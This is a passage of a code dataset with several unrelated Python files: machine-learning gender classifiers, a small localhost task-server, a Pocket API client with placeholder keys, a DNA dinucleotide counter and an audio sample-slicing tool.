0.95\n    \n    mlpClass = MLPClassifier(hidden_layer_sizes= hidden_layer_sizes_, \n                             activation = activation_, \n                             solver=solver_, \n                             alpha = alpha_, \n                             learning_rate = learning_rate_ , \n                             max_iter=max_iter_, \n                             early_stopping = early_stopping_,\n                             random_state=42)\n\n\n    if with_PCA_:\n        #Create PCA to redimention features to have X % variability\n        pca = PCA(n_components=PCA_variability_, random_state=42)\n        \n        model = make_pipeline(pca, mlpClass)\n        \n    elif with_ANOVA_:\n        \n        #ANOVA filter, take 3 best features\n        anova_filter = SelectKBest(f_classif, k=k_features_)\n        \n        # Make Pipeline\n        model = make_pipeline(anova_filter, mlpClass)\n        \n    else:\n        model = mlpClass\n    \n    return model\n\n#%% Cross Validation for Train\nstart = timer()\n\nmetrics_tr = []\nmetrics_val = []\n\n# cross validation for train\nfor number in range(10):\n\n    language = ''\n    mode = 'SubjectDependent'\n    x_tr, y_tr, x_val, y_val, = getDataset(number, language, mode)\n    x_TS, y_TS = getTestDataset(language, mode)\n    \n    lanEnglish_tr = y_tr[:,4]\n    lanEnglish_val = y_val[:,4]\n    lanEnglish_TS = y_TS[:,4] #0 for English; 1 for Native\n\n    y_tr = y_tr[:,1]\n    y_val = y_val[:,1]\n    y_TS = y_TS[:,1] #age\n\n    #model = genderSVM()\n    #model = genderLogReg()\n    model = genderRandomForest()\n    #model = genderMLPClassifier()\n    model.fit(x_tr, y_tr)\n\n    # Assess *this* model\n    metrics_tr.append(getMetrics(model, x_tr, y_tr, 'withProbs'))\n    metrics_val.append(getMetrics(model, x_val, y_val, 'withProbs'))\n\n\nsMetrics_tr = getGeneralMetrics(metrics_tr, 5)\nsMetrics_val = getGeneralMetrics(metrics_val, 5)\n\nprint('Cross-Validation\\n')\nprint('Training Set')\ndisplayGeneralMetrics(sMetrics_tr)\nprint('\\n')\nprint('Validation Set')\ndisplayGeneralMetrics(sMetrics_val)\nprint('\\n')\n\n#%% Final train, before test\n\nx_TR = np.concatenate((x_tr,x_val), axis=0)\ny_TR = np.concatenate((y_tr,y_val), axis=0)\nlanEnglish_TR = np.concatenate((lanEnglish_tr,lanEnglish_val), axis=0)\n\nmodel.fit(x_TR, y_TR)\n\nprint('\\nComplete Train Set')\nmetrics = getMetrics(model, x_TR, y_TR, 'withProbs')\ndisplayMetrics(metrics)\n\n# Comparison of English / Native utterances\nx_TR_english = x_TR[np.where(lanEnglish_TR == 0)]\ny_TR_english = y_TR[np.where(lanEnglish_TR == 0)]\n\nx_TR_native = x_TR[np.where(lanEnglish_TR == 1)]\ny_TR_native = y_TR[np.where(lanEnglish_TR == 1)]\n\nprint('\\nEnglish Results:')\nmetrics = getMetrics(model, x_TR_english, y_TR_english, 'withProbs')\ndisplayMetrics(metrics)\n\nprint('\\nNative Results:')\nmetrics = getMetrics(model, x_TR_native, y_TR_native, 'withProbs')\ndisplayMetrics(metrics)\n\nplot_score_features(x_TR, y_TR)\n\n#%% Test Model\n\nprint('\\nTest Set')\nmetrics = getMetrics(model, x_TS, y_TS, 'withProbs')\ndisplayMetrics(metrics)\n\n# Comparison of English / Native utterances\nx_TS_english = x_TS[np.where(lanEnglish_TS == 0)]\ny_TS_english = y_TS[np.where(lanEnglish_TS == 0)]\n\nx_TS_native = x_TS[np.where(lanEnglish_TS == 1)]\ny_TS_native = y_TS[np.where(lanEnglish_TS == 1)]\n\nprint('\\nEnglish Results:')\nmetrics = getMetrics(model, x_TS_english, y_TS_english, 'withProbs')\ndisplayMetrics(metrics)\n\nprint('\\nNative Results:')\nmetrics = getMetrics(model, x_TS_native, y_TS_native, 'withProbs')\ndisplayMetrics(metrics)\n\ny_pred = model.predict(x_TS)\nc=confusion_matrix(y_TS, y_pred)\ndf_cm = pd.DataFrame(c, range(2), range(2))\nsn.set(font_scale=1.4) # for label size\nsn.heatmap(df_cm, annot=True, annot_kws={\"size\": 16}, cmap=\"YlGnBu\") # font size\n    \nplt.xlabel(\"Predicted Classes\")\nplt.ylabel(\"Actual Classes\")\nplt.title(\"Confusion Matrix - Random Forest, Subject-Dependent\")\nplt.show()\nend = timer()\nprint(f'{end-start:.3f}', 's')\n","sub_path":"gender_classification.py","file_name":"gender_classification.py","file_ext":"py","file_size_in_byte":8085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"378053136","text":"from http.server import BaseHTTPRequestHandler, HTTPServer \r\nimport os\r\nimport threading\r\nimport re\r\nimport subprocess\r\nfrom pathlib import Path\r\n\r\n\"\"\" Класс генератор содержит в себе ip процесса-генератора и номер задачи (потом, возможно, список подзадач) \"\"\"\r\n\r\nclass Generator:\r\n\tdef __init__(self, t, ip):\r\n\t\tself.task = t;\r\n\t\tself.IP = ip\r\n\t\tself.cond = True;\r\n\tdef show(self):\r\n\t\treturn \"Task {0}: Generator IP {1} {2}\".format(self.task, self.IP, \"works\\n\" if self.cond else \"broken \\n\")\r\n\"\"\" метод возвращает всю информацию о генераторе \"\"\"\r\n\r\n\r\nGenerators = {11: Generator(11, 'TestGen.py'), 2 :Generator(2,'TestGen2.py')}\r\n\r\n\r\ndef Gens_Cond():\r\n\tG = ''\r\n\tfor i in Generators.keys():\r\n\t\tG+= Generators.get(i).show()\r\n\treturn G\r\n\r\n\r\n\"\"\" Request Handler \"\"\"\r\n\r\nclass FacadeHandler(BaseHTTPRequestHandler): \r\n\tdef do_GET(self): \r\n\t\trootdir =\"C:/Users/Public/Documents/Programming/Project\" \r\n\t\ttry: \r\n\t\t\tif self.headers['request'] == 'get_tasklist': #запрос списка задач \r\n\t\t\t\tself.send_response(200) \r\n\t\t\t\tself.send_header('request','get_tasklist') \r\n\t\t\t\tself.end_headers() \r\n\t\t\t\tself.wfile.write(Gens_Cond().encode('utf-8')) \r\n\t\t\tif self.headers['request'] == 'get_task': \r\n\t\t\t\tid = int(self.headers['taskID'])\r\n\t\t\t\tif Generators.get(id) != None:\r\n\t\t\t\t\tcmd=rootdir+'/' + Generators.get(id).IP\r\n\t\t\t\t\tif(Path(cmd).exists()):\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tp = subprocess.Popen(cmd, shell = True, stdout=subprocess.PIPE)\r\n\t\t\t\t\t\t\tp.wait()\r\n\t\t\t\t\t\t\tprint(cmd)\r\n\t\t\t\t\t\t\tself.send_response(200)\r\n\t\t\t\t\t\t\tself.send_header('request','get_task')\r\n\t\t\t\t\t\t\tself.send_header('task.ID', self.headers['task.ID'])\r\n\t\t\t\t\t\t\tself.end_headers()\r\n\t\t\t\t\t\t\tself.wfile.write(p.stdout.read())\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tself.send_error(405)\r\n\t\t\t\t\t\t\tGenerators.get(id).cond = False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.send_error(405)\r\n\t\t\t\t\t\tGenerators.get(id).cond = False\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(id);\r\n\t\t\t\t\tprint(Generators.get(id)) \r\n\t\t\t\t\tself.send_error(406) \r\n\t\texcept IOError: \r\n\t\t\tself.send_error(404)\r\n\t\t\t \r\ndef run(server_class=HTTPServer, handler_class=FacadeHandler):\r\n\tserver_address = ('127.0.0.1', 8000)\r\n\thttpd = server_class(server_address, handler_class)\r\n\ttry:\r\n\t\tprint('server is running')\r\n\t\thttpd.serve_forever()\r\n\texcept KeyboardInterrupt:\r\n\t\tprint('server terminated by keyboard')\r\n\r\nif __name__ == '__main__':\r\n\tprint(Generators.keys())\r\n\trun()\r\n\r\n\t\t\r\n\t","sub_path":"Facade.py","file_name":"Facade.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"79437417","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 28 15:20:49 2020\r\n\r\n@author: jghuynh\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sklearn as sk\r\nimport sklearn.model_selection\r\n\r\n#%%\r\n\r\ndef removeUnnecessaryCols(myDataFrame):\r\n    # more than 99% of values is False\r\n    myDataFrame.drop(\"_unit_state\", axis = 1, inplace = True) \r\n    \r\n    # more than 99% of these values are 3\r\n    myDataFrame.drop(\"_trusted_judgments\", axis = 1, inplace = True)\r\n    \r\n    # we don't need links. All these links are like an ID--unique for every person\r\n    myDataFrame.drop(\"profileimage\", axis = 1, inplace = True)\r\n    \r\n    # 100% of values are \"yes\"\r\n    myDataFrame.drop(\"profile_yn\", axis = 1, inplace = True)\r\n    \r\n    # 97% of values are 0\r\n    myDataFrame.drop(\"retweet_count\", axis = 1, inplace = True)\r\n    \r\n    # all names of tweets are IDs. They are unique, so they don't affect data\r\n    myDataFrame.drop(\"name\", axis = 1, inplace = True)\r\n    \r\n    # link bar color, side bar color--they have the same values, so eliminate\r\n    myDataFrame.drop(\"link_color\", axis = 1, inplace = True )\r\n    \r\n    # name and text are all unique values. None of them are the same, so eliminate\r\n    myDataFrame.drop(\"text\", axis = 1, inplace = True)\r\n    \r\n    # so many of tweet_location are invalid or written in weird symbols\r\n    myDataFrame.drop(\"tweet_location\", axis = 1, inplace = True)\r\n    \r\n    return myDataFrame\r\n\r\ndef oneHotEncode(myDataFrame):\r\n    #stringCols = []\r\n    #X = myDataFrame\r\n    \r\n    for column in myDataFrame.columns:\r\n        #print(\"column =\", column, \" type = \", myDataFrame[column].values.dtype)\r\n        if \"O\" == myDataFrame[column].values.dtype:\r\n            \r\n            '''\r\n            if column == \"tweet_location\":\r\n                if len(myDataFrame[column]) > 5:\r\n                    myDataFrame.drop(\"tweet_location\", axis = 0, inplace = True)\r\n            '''\r\n            #stringCols.append(column)\r\n            oneHot = pd.get_dummies(myDataFrame[column])\r\n            myDataFrame = myDataFrame.drop(column, axis = 1)\r\n            myDataFrame = myDataFrame.join(oneHot)\r\n            \r\n    \r\n    #myDataFrame = myDataFrame.drop(myDataFrame.std()[myDataFrame.std() < 0.6].index.values, axis = 1)\r\n    #print(stringCols)\r\n    print(myDataFrame)\r\n    return myDataFrame\r\n\r\n\r\n\r\n# Calculates the error between the predicted value and \r\n# the truth value\r\n# AKA l(yi, qi)\r\n#\r\n# @param yi the actual ground truth\r\n# @param qi the predicted probablity \r\n# @return the calculated error/binary cross entropy\r\ndef binaryCrossEntropy(yi, qi):\r\n    return -(yi * np.log(qi) + (1 - yi)* np.log(1 - qi))\r\n\r\n# Converts a scaler into a probability\r\n# @param u the scaler (also, the predicted value)\r\n# @return the probability\r\ndef sigmoid(u):\r\n    #e = np.exp(1)\r\n    expu = np.exp(u)\r\n    return expu/(1 + expu)\r\n    #return e**u/(1 + e**u)\r\n    \r\n\r\n# Calculates the binary cross entropy\r\n# @param yi the ground truth value\r\n# @param u the predicted probability \r\ndef hi(u, yi):\r\n    \r\n    exp = np.exp(u)\r\n    return -yi*u + np.log(1 + exp)\r\n\r\n# Gets the sum of all the hi's/errors\r\ndef L(beta, X, Y):\r\n    N = X.shape[0] # numer of rows\\\r\n    #cols = X.shape[1]\r\n    mySumHi = 0\r\n    \r\n    # for every row in X\r\n    for i in range(N):\r\n        xihat = X[i] # the ith row of X\r\n        yi = Y[i] # 1 row in X => 1 scaler (0 or 1) in Y\r\n        #print(\"xihat\", xihat)\r\n        #print(\"beta\", beta)\r\n        dotProduct = np.vdot(xihat, beta)\r\n        mySumHi += hi(dotProduct, yi)\r\n    return mySumHi\r\n\r\n\r\n# Calculats the clip of beta with alpha step size\r\n# Basically, beta will go close to origin with alpha step size\r\ndef clip(beta, alpha):\r\n    # so find the min: beta or alpha\r\n    clipped = np.minimum(beta, alpha)\r\n\r\n    # find max: clipped or -alpha\r\n    clipped = np.maximum(clipped, -alpha)\r\n\r\n    return clipped\r\n\r\n# Calculates the proximal norm of betaHat with stepsize alpha\r\n# @betaHat betaHat\r\n# @alpha the stepsize\r\ndef proxL1Norm(betaHat, alpha, penalizeAll = True):\r\n    \r\n    # definition of prox operator\r\n    out = betaHat - clip(betaHat, alpha)\r\n\r\n    if not penalizeAll:\r\n        # set the first value of prox as beta0\r\n        out[0] = betaHat[0]\r\n    \r\n    return out\r\n\r\n# Does Logistic regression with L1 regularized term\r\n    # and proximal gradient descent\r\n\r\n# @param X the X-values, augmented\r\ndef LogRegL1Regularized_proxGrad(X, y, myLambda):\r\n    \r\n    N, d = X.shape\r\n    # N = num rows, d = num columns\r\n    \r\n    maxIter = 50\r\n    # increasing helps\r\n    \r\n    # learn rate\r\n    alpha = 0.00005\r\n\r\n    # note: d is already the augmented size of columns\r\n    beta = np.zeros(d)\r\n\r\n\r\n    costFunVals = np.zeros(maxIter)\r\n    # DOES PROXIMAL gradient method iteration\r\n    for t in range(maxIter):\r\n        # compute gradient of L\r\n        #grad = X.T @ (X @ beta - y) # the smooth part of our objective function,\r\n        # that was for linear regress\r\n        \r\n        grad = np.zeros(d)\r\n        \r\n        # computing grad\r\n        \r\n        # so slow because N is so darn huuge\r\n        for i in range(N):\r\n            Xi = X[i, :]\r\n            Yi = y[i] # the ith y label\r\n            qi= sigmoid(np.vdot(Xi, beta)) # predicted probability\r\n            \r\n            # computes the dot product of 2 vectors\r\n            \r\n            grad += (qi - Yi)*Xi # look at formula for gradient of L(B)\r\n        \r\n        # now my beta is huge\r\n        beta = proxL1Norm(beta - alpha*grad, alpha*myLambda)  \r\n\r\n        # calcualte and save the current objective value\r\n        # compute norm of that vector (norm of error), then square that norm\r\n        # that's the smooth part of our objective function\r\n        # also, add the regularization term\r\n        # which is lamda * L1 norm of beta\r\n        # L1norm of beta = np.sum(np.abs(beta)) = sum of all the abs value of compoenents of beta\r\n        \r\n        # for linear reg\r\n        #costFunVals[t] = 0.5 * np.linalg.norm(X @ beta - y)**2 + myLambda * np.sum(np.abs(beta)) # objective function\r\n        # since beta is not zero, then costFunVal (error) will not approach 0\r\n        \r\n        # for log reg\r\n        costFunVals[t] = L(beta, X, y)\r\n        \r\n        if t % 10 == 0:\r\n            print(\"iteration: \", t, \" Objective Function value: \", costFunVals[t])\r\n    \r\n    return beta, costFunVals\r\n\r\n# Calculates the accuracy percentage of my predictions\r\n# against Y_test\r\n# @param numTest the number of test subjects\r\n# @param predictions my predictions\r\n# @param Y_test the testing data solutions/ground truth\r\ndef findAccuracy(numTest, predictions, Y_test):\r\n    numCorrect = 0\r\n    for i in range(numTest):\r\n        if predictions[i] == Y_test[i]:\r\n            numCorrect += 1\r\n    accuracy = numCorrect/numTest\r\n    return accuracy\r\n\r\ndef getPredictionsLog(numTest, beta):\r\n    myPred = np.zeros(numTest)\r\n    for index in range(numTest):\r\n        Xi = X_test[index]\r\n        myProb = sigmoid(Xi @ beta)\r\n        if myProb < 0.5:\r\n            myPred[index] = 0\r\n        else:\r\n            myPred[index] = 1\r\n    return myPred\r\n\r\n#myGenderFile = pd.read_csv(\"...\\\\gender-classifier-DFE-791531\\\\gender-classifier-DFE-791531.csv\", encoding = \"ISO-8859-1\")\r\n\r\n# Absolute path\r\nmyGenderFile = pd.read_csv(\"C:\\\\Users\\\\jghuynh\\\\Documents\\\\Machine_Learning\\\\Project_#5_Final_Gender\\\\gender-classifier-DFE-791531\\\\gender-classifier-DFE-791531.csv\", encoding = \"ISO-8859-1\")\r\n# type: dataframe\r\n\r\n# All the columns that have more than half the rows/people answered \"NA\"\r\nfewNAs = myGenderFile.columns[myGenderFile.isna().sum() <= 0.5*myGenderFile.shape[0]]\r\nmyGenderFile = myGenderFile[fewNAs]\r\n# eradicated 3 columns that had waaay too many NAss\r\n\r\n# columns with too big std\r\nbigSTD = [\"_golden\", \"gender:confidence\", \"profile_yn:confidence\"]\r\n\r\n# dropping those columns that have too big STD\r\nmyGenderFile.drop(bigSTD, axis = 1, inplace = True)\r\n\r\n# drop the columns in which the person's gender is \"unknown\" or \"brand\" (??)\r\n# in other words, keep the columns where gender is \"female\" or \"male\"\r\n\r\nmyGenderFile = myGenderFile.loc[(myGenderFile.gender == \"female\") | (myGenderFile[\"gender\"] == \"male\")]\r\n\r\nmyGenderFile = removeUnnecessaryCols(myGenderFile)\r\n\r\n# Using numpy to split\r\n# len(myGenderFile) = rows = 12894, for now\r\n# train: 80%\r\n# validate: 10%\r\n# test: 10%\r\n# first param: 0.8 - 80% dataframe for train\r\n# 2nd param: 0.9: 1 - 0.9 = 10% for test\r\n# validate is 10% because 2nd param - 1st param = 0.9 - 0.8 = 0.1 = 10%\r\ntrain, validate, test = np.split(myGenderFile.sample(frac=1), [int(.8*len(myGenderFile)), int(.9*len(myGenderFile))])\r\n#X_train = train\r\ntrain = oneHotEncode(train)\r\nvalidate = oneHotEncode(validate)\r\ntest = oneHotEncode(test)\r\n\r\n# since our gender column is one-hot encoded, we do not have column name \"gender\"\r\n# so now, look at female column\r\n# if value = 1, person is female; male otherwise\r\n\r\nY_train = train[\"female\"].values\r\n# Y_oneHot = pd.get_dummies(Y_train).values\r\n#K = Y_oneHot.shape[1]\r\n\r\nX_train = train.drop(\"female\", axis = 1)\r\nX_train.drop(\"male\", axis = 1, inplace = True)\r\nX_train = X_train.values\r\n\r\nY_valid = validate[\"female\"].values\r\n#X_valid = validate\r\nX_valid = validate.drop(\"female\", axis = 1)\r\nX_valid.drop(\"male\", axis = 1, inplace = True)\r\nX_valid = X_valid.values\r\n\r\nY_test = test[\"female\"].values\r\nX_test = test.drop(\"female\", axis = 1)\r\nX_test.drop(\"male\", axis = 1, inplace = True)\r\n\r\n# getting ride of NAs in the numeric columns\r\ncolsWithNAs = X_train.columns[X_train.isna().sum() > 0]\r\nfor col in colsWithNAs:\r\n    X_train[col] = X_train[col].fillna(X_train[col].mean())\r\n    X_test[col] = X_test[col].fillna(X_test[col].mean())\r\n#X[\"Age\"] = X[\"Age\"].fillna(X[\"Age\"].mean())\r\ncolsWithNAs = X_test.columns[X_test.isna().sum() > 0]\r\nfor col in colsWithNAs:\r\n    X_train[col] = X_train[col].fillna(X_train[col].mean())\r\n    X_test[col] = X_test[col].fillna(X_test[col].mean())\r\n\r\n\r\n\r\n# Wow that took a long time!\r\n\r\n\r\n# how penalized are we to make beta sparse\r\n# mylabda = 100, 200, ... 10000\r\nmyLambda = 900\r\n#beta, costFunVals = solveLasso_proxGrad(X, y, myLambda)\r\n# TODO: Make X_train all numbers\r\nbeta, costFunVals = LogRegL1Regularized_proxGrad(X_train, Y_oneHot, myLambda)\r\n\r\n\r\n\r\n'''\r\n\r\n\r\nX = myGenderFile.loc[:, :]\r\nX.drop(\"gender\", axis = 1, inplace = True)\r\nX = X.values # transform into numpy array\r\n\r\ny = myGenderFile[\"gender\"].values\r\nX_train, X_test, Y_train, Y_test = sk.model_selection.train_test_split(X, y, train_size = 0.8) #random_state = 1)\r\n\r\n# using Skleanr to split\r\nX_train = (X_train - X_train.mean(axis = 0))/X_train.std(axis = 0) # (xvalue - mean)/standard deviation\r\n\r\n# Using numpy to split\r\n# len(myGenderFile) = rows = 12894, for now\r\ntrain, validate, test = np.split(df.sample(frac=1), [int(.8*len(myGenderFile)), int(.9*len(myGenderFile))])\r\nX_train = train\r\nX_train.drop(\"gender\", axis = 1, inplace = True)\r\nX_train = X_train.values\r\n\r\nY_train = train[\"gender\"].values\r\n\r\n\r\n# pretend as if we had never seen the X_test data before.\r\n# our predictions are more slightly accurate\r\n# if use X_test.mean, we are cheating!\r\nX_test = (X_test - X_train.mean(axis = 0))/X_train.std(axis = 0)\r\n\r\n# Augment the X data\r\nX_test = np.insert(X_test, 0, 1, axis = 1)\r\nX_train = np.insert(X_train, 0, 1, axis = 1)\r\n\r\nN = X.shape[0] # number of training examples/rows\r\nd = X.shape[1] # number of characteristics/columns\r\n'''\r\n","sub_path":"Gender_Twitter.py","file_name":"Gender_Twitter.py","file_ext":"py","file_size_in_byte":11163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"506576106","text":"#!/usr/bin/env python3\n#coding: utf-8\n\nimport requests\nimport json\n\n#headers = {'content-type': 'application/x-www-form-urlencoded'}\n\nparamss = {'consumer_key': 'Your Pocket Consumer Key',\n           'access_token': 'Your Pocket Access Token',\n           'username': 'Your User Name'}\n\nr = requests.post(\"https://getpocket.com/v3/get\", params=paramss)\n\nprint(r.url)\nprint(r.status_code)\nprint(r.headers)\n\n\nrj = r.json()\n\n#print(json.dumps(rj, sort_keys=True, indent=2, ensure_ascii=False))\n\nfor key in rj['list'].keys():\n    print(\"{0}: {1}\".format(\"title\", rj['list'][key]['resolved_title']))\n","sub_path":"get_pocket.py","file_name":"get_pocket.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"9886068","text":"entrada = open(\"human.fasta\").read()\nsaida = open(\"human.html\", \"w\")\n\ncont = {}\n\nfor i in ['A', 'T', 'C', 'G']:\n\tfor j in ['A', 'T', 'C', 'G']:\n\t\tcont[i + j] = 0\n\nentrada = entrada.replace(\"\\n\",\"\")\n\ntry:\n\tfor k in range(len(entrada)):\n\t\tcont[entrada[k] + entrada[k + 1]] += 1\nexcept:\n\twarning = 1\n\ni = 1\n\nfor l in cont:\n\tsaida.write(\"\"+l+\"\\n\")\n\tif i % 4 == 0:\n\t\tsaida.write(\"\")\n\n\ti+=1\n\nsaida.close()\n","sub_path":"Estudo de Caso - BioInformática - Genomas/estudo_de_caso_dna_human.py","file_name":"estudo_de_caso_dna_human.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"82771214","text":"\"\"\"Split a wave into multiple equal-sized parts.\"\"\"\nfrom __future__ import print_function\n\nimport wave\nimport os\nimport time\nimport sys\nimport getopt\nfrom inspect import getmembers, isfunction\nfrom pydub import AudioSegment\n\nimport adgcreator\nimport slicers\nimport namegen\n\n\ndef pmsg(message):\n    \"\"\"Message styling.\"\"\"\n    width = 28\n    length = len(message)\n    border = \"##\"\n    i = 1\n    blank = \"\"\n    while i < (width - (length / 2)):\n        blank += \" \"\n        i += 1\n    print(\"%s%s%s%s%s\" % (border, blank, str(message), blank, border))\n    return None\n    # print(\"##### %s #####\" % str(message))\n\n\ndef clr(num=0):\n    \"\"\"Clear screen after num seconds.\"\"\"\n    print(\"Clearing in %d seconds...\" % num)\n    time.sleep(num)\n    os.system('cls' if os.name == 'nt' else 'clear')\n    return\n\n\ndef killit(num=0):\n    \"\"\"Sleep for num seconds and then shut down gracefully.\"\"\"\n    if num > 0:\n        print(\"Shutting down in %i seconds...\" % num)\n        # time.sleep(num)\n    sys.exit(1)\n\n\ndef create_paths(paths, opt, namer=None):\n    \"\"\"Create necessary directories.\"\"\"\n    if opt == 0:\n        paths['adg_path'] = paths['outpath'] + os.sep + namer + \" Project\"\n        paths['config_path'] = paths['adg_path'] + os.sep + \\\n            \"Ableton Project Info\"\n        paths['samp_path'] = paths['adg_path'] + os.sep + \"Samples\" \\\n            + os.sep + \"Imported\"\n    try:\n        for item in paths:\n            if not os.path.exists(paths[item]):\n                os.makedirs(paths[item])\n    except OSError:\n        print(\"Can not create necessary directories.\")\n        killit()\n    if opt == 0:\n        return paths\n    return None\n\n\ndef open_wave_file(fname=None):\n    \"\"\"Open and return list of Wave object and meta.\"\"\"\n    if fname is None:\n        fname = input(\"Name of file to split?: \")\n    pmsg(\"Opening %s\" % fname)\n    try:\n        obj = wave.open(fname, 'r')\n    except OSError:\n        print(\"File does not exist or broken. Closing down.\")\n        killit(2)\n    if (float(obj.getnframes()) / float(obj.getframerate())) < 0.05:\n        print(\"Source file too short. Use a longer source file.\")\n        killit(2)\n    return {'wave': obj,\n            'waveframes': obj.getnframes(),\n            'waverate': obj.getframerate(),\n            'wavechan': obj.getnchannels(),\n            'wavedepth': obj.getsampwidth(),\n            'waveorig': fname}\n\n\ndef choose_slice_type(algos, chosen):\n    \"\"\"Prompt for slice type and initiate specific slice.\"\"\"\n    validletters = ['x', 'X', 'q', 'Q']\n    validchoices = []\n    for i in validletters:\n        validchoices.append(i)\n    for i in list(range(0, len(algos))):\n        validchoices.append(str(i))\n    if chosen is None:\n        pmsg(\"Choose Algorithm\")\n        pmsg(\"\")\n        pmsg(\"Choose a slice algorithm:\")\n        for idx, i in enumerate(algos):\n            print(\"%d = %s\" % (idx, i[1].__doc__))\n        print(\"x = Quit\")\n        choice = input(\"Choice: \")\n        while choice not in validchoices or choice == \"\":\n            choice = input(\"Choice: \")\n        if choice in [\"x\", \"X\", \"q\", \"Q\"]:\n            sys.exit(1)\n    else:\n        if chosen not in validchoices or chosen in validletters:\n            try:\n                chosen = int(chosen)\n                print(\"Error: That slicer option does not exist.\")\n            except ValueError:\n                pmsg(\"\")\n                pmsg(\"Error: Slicer choice must be a number.\")\n            sys.exit(1)\n        pmsg(\"Chosen Algorithm: %s\" % chosen)\n        choice = chosen\n    pmsg(algos[int(choice)][1].__doc__)\n    return algos[int(choice)]\n\n\ndef choose_slice_count(obj, chosen):\n    \"\"\"Prompt for number of samples desired.\"\"\"\n    slice_count = 0\n    max_slices = (obj.getnframes()/20)\n    if max_slices > 128:\n        max_slices = 128\n    pmsg(\"Max slices available: %d\" % max_slices)\n    if chosen is not None:\n        try:\n            slice_count = int(chosen)\n            if slice_count > max_slices:\n                chosen = max_slices\n            if slice_count < 1:\n                chosen = 1\n        except ValueError:\n            pmsg(\"Error: Slice count must be a number\")\n    while (slice_count < 1) or (slice_count > max_slices):\n        slice_count = input(\"How many samples do you want? \")\n        try:\n            slice_count = int(slice_count)\n        except ValueError:\n            print(\"%s is not a number. I need a number.\" % str(slice_count))\n            continue\n        if slice_count > max_slices:\n            print(\"Not enough frames for %d samples.\" % slice_count)\n        if slice_count < 1:\n            print(\"You wouldn't be here if you wanted %d.\" % slice_count)\n    return slice_count\n\n\ndef write_waves(path, source, markers):\n    \"\"\"Write a wave file for every marker in markers.\"\"\"\n    pmsg(\"Writing wave files\")\n    new_obj_list = []\n    p_list = {}\n    p_list['rel'] = path + os.sep + source['namer'] + \" Project\" + os.sep\n    p_list['samp'] = p_list['rel'] + os.sep + \"Samples\"\n    p_list['imp'] = p_list['samp'] + os.sep + \"Imported\"\n    p_list['wavebase'] = p_list['imp'] + os.sep + source['namer'] + \"-\"\n    create_paths({'relpath': p_list['rel'],\n                  'samples': p_list['samp'],\n                  'imported': p_list['imp']}, 1)\n    for idx, mark in enumerate(markers):\n        full_name = p_list['wavebase'] + str(idx + 1) + \".wav\"\n        new_obj = wave.open(full_name, 'w')\n        new_obj.setparams((source['wave'].getnchannels(),\n                           source['wave'].getsampwidth(),\n                           source['wave'].getframerate(),\n                           mark['length'],\n                           \"NONE\",\n                           \"not compressed\"))\n        source['wave'].setpos(mark['sframe'])\n        new_obj.writeframes(source['wave'].readframes(mark['length']))\n        new_obj.close()\n        new_obj_list.append(os.path.abspath(full_name))\n    return new_obj_list\n\n\ndef set_vol(file_list):\n    \"\"\"Set volume of sample.\"\"\"\n    vol_list = []\n    for item in file_list:\n        work = AudioSegment.from_wav(item)\n        vol_list.append(\"%.2f\" % (-12 + (work.dBFS * -1)))\n    return vol_list\n\n\ndef generate_name(min_len, max_len, fname):\n    \"\"\"Generate name using Markov chain - namegen.\"\"\"\n    splitters = ['a', 'e', 'i', 'o', 'u', 'qu', 'gh']\n    with open(fname, 'r') as obj:\n        filedata = [x.lstrip().rstrip() for x in obj.readlines()]\n    new_name = namegen.GenerateName(\n        namegen.SplitAtTerms(filedata, splitters),\n        min_len, max_len, '')\n    return new_name\n\n\ndef set_options(opts):\n    \"\"\"Set standard options.\"\"\"\n    options = {x: None for x in ['input_file',\n                                 'slicer',\n                                 'count',\n                                 'non_slicer']}\n    for i in opts:\n        options[i] = opts[i]\n    options['non_slicer'] = ['set_lengths', 'new_set_lengths', 'ask_len']\n    return options\n\n\ndef get_args(args):\n    \"\"\"Get arguments if they exist.\"\"\"\n    help_text = \"livewaveslicer.py \\\n                {-i  \\\n                 -s  \\\n                 -c  \\\n                 -n }\"\n    try:\n        opts, args = getopt.getopt(args,\n                                   \"hi:s:c:n:\",\n                                   [\"ifile=\",\n                                    \"slicer=\",\n                                    \"count=\",\n                                    \"namer=\"])\n    except getopt.GetoptError:\n        print(help_text)\n        killit()\n\n    options = {}\n    for opt, arg in opts:\n        if opt == '-h':\n            print(help_text)\n            sys.exit()\n        elif opt in (\"-i\", \"--ifile\"):\n            options['input_file'] = arg\n        elif opt in (\"-s\", \"--slicer\"):\n            options['slicer'] = arg\n        elif opt in (\"-c\", \"--count\"):\n            options['count'] = arg\n        elif opt in (\"-n\", \"--namer\"):\n            options['namer'] = arg\n    return options\n\n\ndef handle(args):\n    \"\"\"Main program execution handler.\"\"\"\n    clr()\n    opts = set_options(get_args(args))\n    slicerlist = [x for x in getmembers(slicers)\n                  if isfunction(x[1])\n                  and x[0] not in opts['non_slicer']]\n\n    if opts['input_file']:\n        lump = open_wave_file(opts['input_file'])\n    else:\n        lump = open_wave_file()\n\n    opts['slicer'] = choose_slice_type(slicerlist, opts['slicer'])\n    opts['count'] = choose_slice_count(lump['wave'], opts['count'])\n    marker_list = opts['slicer'][1](lump, opts)\n    if marker_list is None:\n        print(\"No slices - exiting...\")\n        sys.exit()\n    finish = input(\"Ready to build - do you want to continue?? (Y/N): \")\n    if finish in ['y', 'Y']:\n        try:\n            lump['namer'] = generate_name(6, 16, opts['namer'])\n        except KeyError:\n            lump['namer'] = generate_name(6, 16, 'namegen-source.txt')\n        workpaths = {'outpath': \"output\"}\n        workpaths = create_paths(workpaths, 0, lump['namer'])\n        file_list = write_waves(workpaths['outpath'], lump, marker_list)\n        volume_list = set_vol(file_list)\n        